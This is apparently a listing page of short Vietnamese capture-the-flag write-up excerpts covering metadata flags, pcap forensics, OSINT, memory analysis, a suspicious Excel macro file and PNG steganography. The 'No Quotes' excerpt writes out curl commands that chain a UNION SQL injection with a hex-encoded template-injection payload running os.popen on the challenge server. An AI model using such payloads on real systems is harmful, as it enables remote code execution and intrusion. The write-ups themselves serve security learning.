baby serial let-the-penguin-live Kiểm tra thông tin file mkv đề choffprobe -hide_banner challenge.mkv Input #0, matroska,webm, from 'challenge.mkv': Metadata: title : Penguin COMMENT : EH4X{k33p_try1ng} MAJOR_BRAND : isom MINOR_VERSION : 512 COMPATIBLE_BRANDS: isomiso2avc1mp41 ENCODER : Lavf62.3.100 Duration: 00:01:03.02, start: 0.00000..
Flag finderBài cổ quá rồi nên mình không nhớ web đấy có gì, đại loại là nó chưa một file script.js mà mình thấy sú xong tải vềScript.jsconst fullInput = document.getElementById('fullInput'); const find = document.getElementById('find'); const result = document.getElementById('result'); const len = 1919; const theFlag = /^(?=(?=(?:.{91}\..{9})*(?:.{91}#.{9}){4}(?:.{91}\..{9})+(?:.{91}#.{9}){5}(?:..
ExfilKhi Follow TCP Stream thì mình phát hiện ra có 1 IP đang thử tấn công web bằng SQLiMình sẽ filter để các gói tin của địa chỉ IP 192.168.1.50 Có thể thấy hacker đã chạy reverse shell, ngay bên dưới là kết nối reverse shell luônNhận được key và cipher text, giải mãenc_hex = "2e195405354a402366402a524734671f395a5a323e451e625d2c2507142b504a27064a" key = b"Kj7mN2pQ9sR4vX8y" enc = bytes.fromhex(e..
No Quotes URL='https://no-quotes-2a0e52571125e072.chals.uoftctf.org'H=$(python3 - p="{{cycler.__init__.__globals__.os.popen(request.args.c).read()}}" print(p.encode().hex()) PY ) # login (UNION trả về 2 cột: id, username) curl -s -c c.txt -L -X POST "$URL/login" \ --data-urlencode "username=x\\" \ --data-urlencode "password=) UNION SELECT 1, CAST(0x$H AS CHAR) # " \ >/dev/nullcurl -s -b c...
Đề bàiMình nhận được thông điệp để lại như sau: "ChristmasKid-2025"Part 1Với nội dung được để lại như này, mình sẽ đoán đây là nickname của account nào đó, nên mình sử dụng BlackBird để tìm kiếmThấy có một accout YouTube có id là @ChristmasKid-2025Truy cập vào thửVào phần Playlist sẽ thấy có 2 videoNhưng 1 video đã bị ẩnSau đó mình thử kiểm tra xem trên Web Archive có lưu thông tin của playlist ..
Đề bàiGiảiBài này cho mình Memory File của Windows$ file MEMORY.DMP MEMORY.DMP: MS Windows 64bit crash dump, version 15.7601, 2 processors, DumpType (0x1), 524158 pagesVới Mem File thì mình sẽ tiếp tục dùng Volatility3 thôipslist$ vol3 -f MEMORY.DMP windows.pslistVolatility 3 Framework 2.26.2/home/kali/volatility3/volatility3/framework/deprecation.py:105: FutureWarning: This plugin (PluginRequir..
Đề bàiGiảiBài này cho mình một file NoStarWhere.pcapng, chắc là "Không sao đâu 🐧"Ở đây mình sẽ xem nó bao gồm những file gìCó một file là Danh sách phòng thi.xlsCó vẻ file này đã bị hỏng, mình sẽ dùng olevba để check qua xem$ olevba Danh%20s%C3%A1ch%20ph%C3%B2ng%20thi.xls olevba 0.60.2 on Python 3.13.7 - http://decalage.info/python/oletools=======================================================..
Đề bàiGiảiĐề bài cho mình một file ảnh sauĐầu tiên vẫn sẽ là kiểm tra file ảnh$ pngcheck legit.png legit.png additional data after IEND chunkERROR: legit.pngThấy nó có dư ra một đoạn dữ liệu sau IEND, xem sau bằng HxD vậy, mình sẽ binwalk trước$ binwalk legit.png DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 ..
